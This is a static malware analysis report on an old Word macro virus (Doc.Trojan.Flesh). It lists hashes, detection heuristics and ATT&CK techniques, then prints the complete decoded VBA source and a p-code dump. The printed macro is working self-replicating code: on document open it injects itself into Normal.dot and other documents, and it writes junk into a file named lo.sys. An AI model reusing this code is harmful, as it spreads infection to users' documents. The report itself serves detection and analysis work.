Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 06f5fed96a46196a…

MALICIOUS

Office (OLE)

41.0 KB Created: 1998-11-02 17:57:00 Authoring application: Microsoft Word 8.0 First seen: 2015-09-26
MD5: 4dc59241cc63741d78d0fb66296e4980 SHA-1: 45c522b2bd65a9c7b3958b2f460c6e3aa3bab7a7 SHA-256: 06f5fed96a46196a2e6e2fb73fe5a0b46f991ed6a71e45464c41426ba3986ca9
236 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is a malicious Office document containing VBA macros. The macros exhibit self-replication behavior, attempting to infect other documents and templates, as evidenced by the 'OLE_VBA_MACRO_VIRUS_REPLICATION' heuristic and the script's logic. The 'Document_Open' subroutine initiates the infection process, and the script attempts to copy itself into the Normal.dot template, which is a common persistence mechanism.

Heuristics 6

  • ClamAV: Doc.Trojan.Flesh-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Flesh-1
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
            If ToOwn.CountOfLines <= 1 Then ToOwn.InsertLines 1, "Sub AutoOpen()" & Chr(13) & "'" & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(13) & "End Sub"
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
            If ToOwn.CountOfLines <= 1 Then ToOwn.InsertLines 1, "Sub AutoOpen()" & Chr(13) & "'" & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(13) & "End Sub"
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12634 bytes
SHA-256: f4c461aecaafc88eec2c636a3abc807a1ddd2e2db51f81bb2e8bfa5127e7b68a
Detection
ClamAV: Doc.Trojan.Flesh-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
GoSub Flesh:
'macro code of user
'macro code of user
'macro code of user
'macro code of user
'THIS IS THE ORIGINAL VERSION OF THE PARASIT VIRUS OF LORD Arz
'let's have fun...
Flesh:
If Hook = 1 Then Exit Sub
Owner = ThisDocument.Name
If UCase(Owner) = "NORMAL.DOT" Then Ways = 1 Else Ways = 0
Select Case Ways
Case 0
    
    For c = 1 To ActiveDocument.VBProject.VBComponents.Count
        If ActiveDocument.VBProject.VBComponents(c).CodeModule.Lines(2, 1) = "GoSub Flesh:" Then Set Carrier = ActiveDocument.VBProject.VBComponents(c).CodeModule
    Next c
    For i = 1 To Carrier.CountOfLines
        If Carrier.Lines(i, 1) = "Flesh:" Then
            For x = i To Carrier.CountOfLines - 1
                VC = VC & Carrier.Lines(x, 1) & Chr(13)
            Next x
            VC = Left(VC, Len(VC) - 1)
        i = x
        End If
    Next i
    
    For i = 1 To NormalTemplate.VBProject.VBComponents.Count
        Set ToOwn = NormalTemplate.VBProject.VBComponents(i).CodeModule
        If ToOwn.CountOfLines <= 1 Then ToOwn.InsertLines 1, "Sub AutoOpen()" & Chr(13) & "'" & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(13) & "End Sub"
        If ToOwn.Lines(2, 1) = "GoSub Flesh:" Then GoTo FAllDoneP
        For x = 1 To ToOwn.CountOfLines + 1
            If Left(ToOwn.Lines(x, 1), 3) = "Sub" Or Left(ToOwn.Lines(x, 1), 10) = "Private Sub" Then ToOwn.InsertLines x + 1, "Gosub Flesh:"
            If Left(ToOwn.Lines(x, 1), 7) = "End Sub" Then ToOwn.InsertLines x, VC
        Next x
FAllDoneP:
    Next i
GoTo DeadFlesh
Case 1
    
    For c = 1 To NormalTemplate.VBProject.VBComponents.Count
        If NormalTemplate.VBProject.VBComponents(c).CodeModule.Lines(2, 1) = "GoSub Flesh:" Then Set Carrier = ActiveDocument.VBProject.VBComponents(c).CodeModule
    Next c
    For i = 1 To Carrier.CountOfLines
        If Carrier.Lines(i, 1) = "Flesh:" Then
            For x = i To Carrier.CountOfLines - 1
                VC = VC & Carrier.Lines(x, 1) & Chr(13)
            Next x
            VC = Left(VC, Len(VC) - 1)
        i = x
        End If
    Next i
    
    For i = 1 To ActiveDocument.VBProject.VBComponents.Count
        Set ToOwn = ActiveDocument.VBProject.VBComponents(i).CodeModule
        If ToOwn.CountOfLines <= 1 Then ToOwn.InsertLines 1, "Sub AutoOpen()" & Chr(13) & "'" & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(13) & "End Sub"
        If ToOwn.Lines(2, 1) = "GoSub Flesh:" Then GoTo PAllDoneF
        For x = 1 To ToOwn.CountOfLines + 1
            If Left(ToOwn.Lines(x, 1), 3) = "Sub" Or Left(ToOwn.Lines(x, 1), 10) = "Private Sub" Then ToOwn.InsertLines x + 1, "Gosub Flesh:"
            If Left(ToOwn.Lines(x, 1), 7) = "End Sub" Then ToOwn.InsertLines x, VC
        Next x
PAllDoneF:
    Next i
End Select
DeadFlesh:
EatUp = Int(Rnd * 50000000) + 10000000
Theef = Int(Rnd * 255)
Open "lo.sys" For Binary As #1
Put #1, EatUp, Theef
Close #1
Hook = 1
Return
End Sub

' Processing file: /opt/analyzer/scan_staging/57360337f4634796abcf405d46840611.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 15245 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Open())
' Line #1:
' 	GoSub Flesh 
' 	BoS 0x0000 
' Line #2:
' 	QuoteRem 0x0000 0x0012 "macro code of user"
' Line #3:
' 	QuoteRem 0x0000 0x0012 "macro code of user"
' Line #4:
' 	QuoteRem 0x0000 0x0012 "macro code of user"
' Line #5:
' 	QuoteRem 0x0000 0x0012 "macro code of user"
' Line #6:
' 	QuoteRem 0x0000 0x003D "THIS IS THE ORIGINAL VERSION OF THE PARASIT VIRUS OF LORD Arz"
' Line #7:
' 	QuoteRem 0x0000 0x0011 "let's have fun..."
' Line #8:
' 	Label Flesh 
' Line #9:
' 	Ld Hook 
' 	LitDI2 0x0001 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	ExitSub 
' 	EndIf 
' Line #10:
' 	Ld ThisDocument 
' 	MemLd New 
' 	St Owner 
' Line #11:
' 	Ld Owner 
' 	ArgsLd UCase 0x0001 
' 	LitStr 0x000A "NORMAL.DOT"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitDI2 0x0001 
' 	St Ways 
' 	Else 
' 	BoSImplicit 
' 	LitDI2 0x0000 
' 	St Ways 
' 	EndIf 
' Line #12:
' 	Ld Ways 
' 	SelectCase 
' Line #13:
' 	LitDI2 0x0000 
' 	Case 
' 	CaseDone 
' Line #14:
' Line #15:
' 	StartForVariable 
' 	Ld c 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	MemLd Count 
' 	For 
' Line #16:
' 	LitDI2 0x0002 
' 	LitDI2 0x0001 
' 	Ld c 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	LitStr 0x000C "GoSub Flesh:"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	SetStmt 
' 	Ld c 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set Carrier 
' 	EndIf 
' Line #17:
' 	StartForVariable 
' 	Ld c 
' 	EndForVariable 
' 	NextVar 
' Line #18:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld Carrier 
' 	MemLd CountOfLines 
' 	For 
' Line #19:
' 	Ld i 
' 	LitDI2 0x0001 
' 	Ld Carrier 
' 	ArgsMemLd Lines 0x0002 
' 	LitStr 0x0006 "Flesh:"
' 	Eq 
' 	IfBlock 
' Line #20:
' 	StartForVariable 
' 	Ld x 
' 	EndForVariable 
' 	Ld i 
' 	Ld Carrier 
' 	MemLd CountOfLines 
' 	LitDI2 0x0001 
' 	Sub 
' 	For 
' Line #21:
' 	Ld VC 
' 	Ld x 
' 	LitDI2 0x0001 
' 	Ld Carrier 
' 	ArgsMemLd Lines 0x0002 
' 	Concat 
' 	LitDI2 0x000D 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	St VC 
' Line #22:
' 	StartForVariable 
' 	Ld x 
' 	EndForVariable 
' 	NextVar 
' Line #23:
' 	Ld VC 
' 	Ld VC 
' 	FnLen 
' 	LitDI2 0x0001 
' 	Sub 
' 	ArgsLd LBound 0x0002 
' 	St VC 
' Line #24:
' 	Ld x 
' 	St i 
' Line #25:
' 	EndIfBlock 
' Line #26:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	NextVar 
' Line #27:
' Line #28:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	MemLd Count 
' 	For 
' Line #29:
' 	SetStmt 
' 	Ld i 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set ToOwn 
' Line #30:
' 	Ld ToOwn 
' 	MemLd CountOfLines 
' 	LitDI2 0x0001 
' 	Le 
' 	If 
' 	BoSImplicit 
' 	LitDI2 0x0001 
' 	LitStr 0x000E "Sub AutoOpen()"
' 	LitDI2 0x000D 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x0001 "'"
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x0019 
' 	Mul 
' 	FnInt 
' 	LitDI2 0x0041 
' 	Add 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x0019 
' 	Mul 
' 	FnInt 
' 	LitDI2 0x0041 
' 	Add 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x0019 
' 	Mul 
' 	FnInt 
' 	LitDI2 0x0041 
' 	Add 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitDI2 0x000D 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x0007 "End Sub"
' 	Concat 
' 	Ld ToOwn 
' 	ArgsMemCall InsertLines 0x0002 
' 	EndIf 
' Line #31:
' 	LitDI2 0x0002 
' 	LitDI2 0x0001 
' 	Ld ToOwn 
' 	ArgsMemLd Lines 0x0002 
' 	LitStr 0x000C "GoSub Flesh:"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	GoTo FAllDoneP 
' 	EndIf 
' Line #32:
' 	StartForVariable 
' 	Ld x 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld ToOwn 
' 	MemLd CountOfLines 
' 	LitDI2 0x0001 
' 	Add 
' 	For 
' Line #33:
' 	Ld x 
' 	LitDI2 0x0001 
' 	Ld ToOwn 
' 	ArgsMemLd Lines 0x0002 
' 	LitDI2 0x0003 
' 	ArgsLd LBound 0x0002 
' 	LitStr 0x0003 "Sub"
' 	Eq 
' 	Ld x 
' 	LitDI2 0x0001 
' 	Ld ToOwn 
' 	ArgsMemLd Lines 0x0002 
' 	LitDI2 0x000A 
' 	ArgsLd LBound 0x0002 
' 	LitStr 0x000B "Private Sub"
' 	Eq 
' 	Or 
' 	If 
' 	BoSImplicit 
' 	Ld x 
' 	LitDI2 0x0001 
' 	Add 
' 	LitStr 0x000C "Gosub Flesh:"
' 	Ld ToOwn 
' 	ArgsMemCall InsertLines 0x0002 
' 	EndIf 
' Line #34:
' 	Ld x 
' 	LitDI2 0x0001 
' 	Ld ToOwn 
' 	ArgsMemLd Lines 0x0002 
' 	LitDI2 0x0007 
' 	ArgsLd LBound 0x0002 
' 	LitStr 0x0007 "End Sub"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	Ld x 
' 	Ld VC 
' 	Ld ToOwn 
' 	ArgsMemCall InsertLines 0x0002 
' 	EndIf 
' Line #35:
' 	StartForVariable 
' 	Ld x 
' 	EndForVariable 
' 	NextVar 
' Line #36:
' 	Label FAllDoneP 
' Line #37:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	NextVar 
' Line #38:
' 	GoTo DeadFlesh 
' Line #39:
' 	LitDI2 0x0001 
' 	Case 
' 	CaseDone 
' Line #40:
' Line #41:
' 	StartForVariable 
' 	Ld c 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	MemLd Count 
' 	For 
' Line #42:
' 	LitDI2 0x0002 
' 	LitDI2 0x0001 
' 	Ld c 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	LitStr 0x000C "GoSub Flesh:"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	SetStmt 
' 	Ld c 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set Carrier 
' 	EndIf 
' Line #43:
' 	StartForVariable 
' 	Ld c 
' 	EndForVariable 
' 	NextVar 
' Line #44:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld Carrier 
' 	MemLd CountOfLines 
' 	For 
' Line #45:
' 	Ld i 
' 	LitDI2 0x0001 
' 	Ld Carrier 
' 	ArgsMemLd Lines 0x0002 
' 	LitStr 0x0006 "Flesh:"
' 	Eq 
' 	IfBlock 
' Line #46:
' 	StartForVariable 
' 	Ld x 
' 	EndForVariable 
' 	Ld i 
' 	Ld Carrier 
' 	MemLd CountOfLines 
' 	LitDI2 0x0001 
' 	Sub 
' 	For 
' Line #47:
' 	Ld VC 
' 	Ld x 
' 	LitDI2 0x0001 
' 	Ld Carrier 
' 	ArgsMemLd Lines 0x0002 
' 	Concat 
' 	LitDI2 0x000D 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	St VC 
' Line #48:
' 	StartForVariable 
' 	Ld x 
' 	EndForVariable 
' 	NextVar 
' Line #49:
' 	Ld VC 
' 	Ld VC 
' 	FnLen 
' 	LitDI2 0x0001 
' 	Sub 
' 	ArgsLd LBound 0x0002 
' 	St VC 
' Line #50:
' 	Ld x 
' 	St i 
' Line #51:
' 	EndIfBlock 
' Line #52:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	NextVar 
' Line #53:
' Line #54:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	MemLd Count 
' 	For 
' Line #55:
' 	SetStmt 
' 	Ld i 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set ToOwn 
' Line #56:
' 	Ld ToOwn 
' 	MemLd CountOfLines 
' 	LitDI2 0x0001 
' 	Le 
' 	If 
' 	BoSImplicit 
' 	LitDI2 0x0001 
' 	LitStr 0x000E "Sub AutoOpen()"
' 	LitDI2 0x000D 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x0001 "'"
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x0019 
' 	Mul 
' 	FnInt 
' 	LitDI2 0x0041 
' 	Add 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x0019 
' 	Mul 
' 	FnInt 
' 	LitDI2 0x0041 
' 	Add 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x0019 
' 	Mul 
' 	FnInt 
' 	LitDI2 0x0041 
' 	Add 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitDI2 0x000D 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x0007 "End Sub"
' 	Concat 
' 	Ld ToOwn 
' 	ArgsMemCall InsertLines 0x0002 
' 	EndIf 
' Line #57:
' 	LitDI2 0x0002 
' 	LitDI2 0x0001 
' 	Ld ToOwn 
' 	ArgsMemLd Lines 0x0002 
' 	LitStr 0x000C "GoSub Flesh:"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	GoTo PAllDoneF 
' 	EndIf 
' Line #58:
' 	StartForVariable 
' 	Ld x 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld ToOwn 
' 	MemLd CountOfLines 
' 	LitDI2 0x0001 
' 	Add 
' 	For 
' Line #59:
' 	Ld x 
' 	LitDI2 0x0001 
' 	Ld ToOwn 
' 	ArgsMemLd Lines 0x0002 
' 	LitDI2 0x0003 
' 	ArgsLd LBound 0x0002 
' 	LitStr 0x0003 "Sub"
' 	Eq 
' 	Ld x 
' 	LitDI2 0x0001 
' 	Ld ToOwn 
' 	ArgsMemLd Lines 0x0002 
' 	LitDI2 0x000A 
' 	ArgsLd LBound 0x0002 
' 	LitStr 0x000B "Private Sub"
' 	Eq 
' 	Or 
' 	If 
' 	BoSImplicit 
' 	Ld x 
' 	LitDI2 0x0001 
' 	Add 
' 	LitStr 0x000C "Gosub Flesh:"
' 	Ld ToOwn 
' 	ArgsMemCall InsertLines 0x0002 
' 	EndIf 
' Line #60:
' 	Ld x 
' 	LitDI2 0x0001 
' 	Ld ToOwn 
' 	ArgsMemLd Lines 0x0002 
' 	LitDI2 0x0007 
' 	ArgsLd LBound 0x0002 
' 	LitStr 0x0007 "End Sub"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	Ld x 
' 	Ld VC 
' 	Ld ToOwn 
' 	ArgsMemCall InsertLines 0x0002 
' 	EndIf 
' Line #61:
' 	StartForVariable 
' 	Ld x 
' 	EndForVariable 
' 	NextVar 
' Line #62:
' 	Label PAllDoneF 
' Line #63:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	NextVar 
' Line #64:
' 	EndSelect 
' Line #65:
' 	Label DeadFlesh 
' Line #66:
' 	Ld Rnd 
' 	LitDI4 0xF080 0x02FA 
' 	Mul 
' 	FnInt 
' 	LitDI4 0x9680 0x0098 
' 	Add 
' 	St EatUp 
' Line #67:
' 	Ld Rnd 
' 	LitDI2 0x00FF 
' 	Mul 
' 	FnInt 
' 	St Theef 
' Line #68:
' 	LitStr 0x0006 "lo.sys"
' 	LitDI2 0x0001 
' 	Sharp 
' 	LitDefault 
' 	Open (For Binary)
' Line #69:
' 	LitDI2 0x0001 
' 	Sharp 
' 	Ld EatUp 
' 	Ld Theef 
' 	PutRec 
' Line #70:
' 	LitDI2 0x0001 
' 	Sharp 
' 	Close 0x0001 
' Line #71:
' 	LitDI2 0x0001 
' 	St Hook 
' Line #72:
' 	Return 
' Line #73:
' 	EndSub

Open this report in the interactive analyzer, or submit your own file for analysis.